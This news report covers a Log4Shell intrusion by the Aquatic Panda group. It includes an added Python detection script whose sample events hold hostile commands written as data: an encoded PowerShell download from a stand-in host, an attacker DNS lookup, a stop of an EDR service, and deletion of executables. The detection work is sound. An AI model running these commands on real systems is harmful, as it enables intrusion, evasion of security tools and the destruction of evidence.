30 December 2021

China-based cyber spies breached an academic institution through Log4j flaw

A China-linked cyber-espionage group known as Aquatic Panda has recently been spotted exploiting the Log4Shell vulnerability to break into a large academic institution.

According to the latest report from CrowdStrike’s Falcon OverWatch team, the adversary used a modified version of the Log4Shell exploit (initially published on GitHub on December 13) to gain access to a VMware Horizon instance that used the vulnerable Log4j library at an unnamed academic institution.

The purpose of the attack is unknown because the intrusion was thwarted.

“OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion,” the team said.

The threat actor performed connectivity checks via DNS lookups for a subdomain executed under the Apache Tomcat service running on the VMware Horizon instance. The attackers then executed a series of Linux commands on a Windows host under the Apache Tomcat service to retrieve additional tools hosted on remote infrastructure.

Aquatic Panda performed reconnaissance from the host to better understand current privilege levels and system and domain details. The adversary also attempted to discover and stop a third-party endpoint detection and response (EDR) service.

The hackers then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. The OverWatch team also observed multiple attempts at credential harvesting. The threat actor used WinRAR to compress the memory dump in preparation for exfiltration and deleted all executables from the ProgramData and Windows\temp\ directories to cover their tracks.
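The chain described in the preceding paragraphs (commands spawned by the Horizon Tomcat service, a Base64-encoded PowerShell command, discovery and stop attempts against an EDR service, WinRAR compressing a memory dump, executables deleted from ProgramData and Windows\temp) is exactly what a detection engineer would want to catch from process-creation telemetry. The script below is an added illustration, not code from the article or from CrowdStrike: it runs a few simple rules over constructed events. The Tomcat service binary name (ws_TomcatService.exe), the EDR service name, and every path and hostname in it are assumptions made up for the demo.

```python
"""Toy detection pass, added here as an illustration and not taken from the
article or from CrowdStrike. It scores constructed process-creation events
against the chain the article describes: the Horizon Tomcat service spawning
recon commands, an encoded PowerShell download, EDR discovery/stop attempts,
archiving of a memory dump, and deletion of executables from staging folders.
All paths, hostnames and service names below are made up for the demo."""
import base64
import re
from pathlib import PureWindowsPath

# Assumption: the Horizon Tomcat service appears in telemetry as
# ws_TomcatService.exe; plain Tomcat/Java launchers are matched as well.
TOMCAT_PARENT = re.compile(r"^(?:ws_tomcatservice|tomcat\d*|java)\.exe$", re.I)
RECON_WORDS = re.compile(
    r"\b(?:whoami|hostname|systeminfo|ipconfig|nslookup|net\s+(?:user|group|localgroup))\b", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SERVICE_QUERY = re.compile(r"\bsc(?:\.exe)?\s+(?:query|qc)\b", re.I)
SERVICE_TAMPER = re.compile(
    r"\b(?:sc(?:\.exe)?\s+(?:stop|delete|config)|net(?:\.exe)?\s+stop|taskkill(?:\.exe)?)\b", re.I)
ARCHIVER = re.compile(r"^(?:rar|winrar)\.exe$", re.I)
DELETE_CMD = re.compile(r"\b(?:del|erase|remove-item|rm)\b", re.I)
STAGING_DIRS = ("\\programdata\\", "\\windows\\temp\\")
EDR_SERVICE_NAMES = {"exampleedrservice"}  # placeholder: put your real EDR service name(s) here


def encode_ps(command: str) -> str:
    """Encode a command the way PowerShell -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse encode_ps; returns "" when the blob is not valid UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse(event: dict) -> list:
    """Return (tag, detail) findings for one event; an empty list means nothing matched."""
    parent = PureWindowsPath(event["parent"]).name
    image = PureWindowsPath(event["image"]).name
    cmd = event["cmdline"]
    low = cmd.lower()
    findings = []
    if TOMCAT_PARENT.match(parent):           # anything the Horizon Tomcat spawns is worth a look
        findings.append(("tomcat-child", f"{parent} spawned {image}"))
    if RECON_WORDS.search(cmd):               # host / privilege / domain reconnaissance
        findings.append(("recon-command", cmd))
    m = ENC_FLAG.search(cmd)
    if m:                                     # surface the decoded payload for the analyst
        findings.append(("encoded-powershell", decode_ps(m.group(1)) or "<not decodable>"))
    names_edr = any(n in low for n in EDR_SERVICE_NAMES)
    if names_edr and SERVICE_QUERY.search(cmd):
        findings.append(("edr-discovery", cmd))
    if names_edr and SERVICE_TAMPER.search(cmd):
        findings.append(("edr-stop-attempt", cmd))
    if ARCHIVER.match(image) and ".dmp" in low:   # memory dump being staged for exfiltration
        findings.append(("memory-dump-archived", cmd))
    if DELETE_CMD.search(cmd) and ".exe" in low and any(d in low for d in STAGING_DIRS):
        findings.append(("exe-cleanup-in-staging-dirs", cmd))
    return findings


# Constructed telemetry (loosely Sysmon event-ID-1 shaped); nothing here is real data.
HORIZON_TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
STAGE2 = encode_ps("Invoke-WebRequest -Uri http://tools.example.invalid/stage2.ps1 "
                   r"-OutFile C:\ProgramData\stage2.ps1")
SAMPLE_EVENTS = [
    {"id": 1, "parent": HORIZON_TOMCAT, "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup check.example-attacker.invalid"},
    {"id": 2, "parent": HORIZON_TOMCAT, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c whoami && hostname && net group "domain admins" /domain'},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + STAGE2},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": "sc.exe query ExampleEDRService"},
    {"id": 5, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": "sc.exe stop ExampleEDRService"},
    {"id": 6, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Program Files\WinRAR\Rar.exe",
     "cmdline": r"Rar.exe a C:\ProgramData\out.rar C:\ProgramData\mem.dmp"},
    {"id": 7, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c del /q C:\ProgramData\*.exe C:\Windows\Temp\*.exe"},
    {"id": 8, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},  # benign control event
]


def run_demo(events=None) -> dict:
    """Map event id -> list of finding tags, so a caller can check results."""
    return {e["id"]: [tag for tag, _ in analyse(e)] for e in (events or SAMPLE_EVENTS)}


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        for tag, detail in analyse(event):
            print(f"event {event['id']}: {tag}: {detail}")
```

The rules are deliberately coarse; the point is the parent/child relationship (a Java application server should never be launching nslookup, cmd.exe or PowerShell) and the follow-on behaviours that the article lists, which together give far higher confidence than any single match. A real deployment would replace the constructed events with Sysmon or EDR process-creation records and the placeholder service name with the one actually installed.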

“Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” CrowdStrike said.
